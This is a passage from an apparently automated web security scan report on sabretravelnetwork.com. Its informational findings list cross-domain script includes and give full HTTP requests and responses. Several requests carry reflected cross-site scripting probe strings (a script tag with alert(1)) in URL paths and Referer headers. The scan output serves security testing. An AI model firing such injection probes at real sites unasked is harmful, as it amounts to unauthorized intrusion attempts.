Cookie: exp_last_visit=1002258416; exp_last_activity=1317618439; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618472; expires=Tue, 02-Oct-2012 00:07:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:52 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.103. http://www.sabretravelnetwork.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618417; expires=Tue, 02-Oct-2012 00:06:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:06:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.104. http://www.sabretravelnetwork.com/home/products_services/product_index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621525; expires=Tue, 02-Oct-2012 00:58:45 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fsearch86891abb159fbf953a%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fsearch39ea0abec86970faa3%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.105. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/product_index/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/product_index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621522; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.4.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621531; expires=Tue, 02-Oct-2012 00:58:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.106. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.107. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621625; expires=Tue, 02-Oct-2012 01:00:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.108. http://www.sabretravelnetwork.com/home/search/show_results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...
20.109. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.110. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.111. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.112. http://www.sabretravelnetwork.com/images/home-text.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</form>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
20.113. http://www.sabretravelnetwork.com/map.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /map.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /map.html HTTP/1.1
Host: www.sabretravelnetwork.com
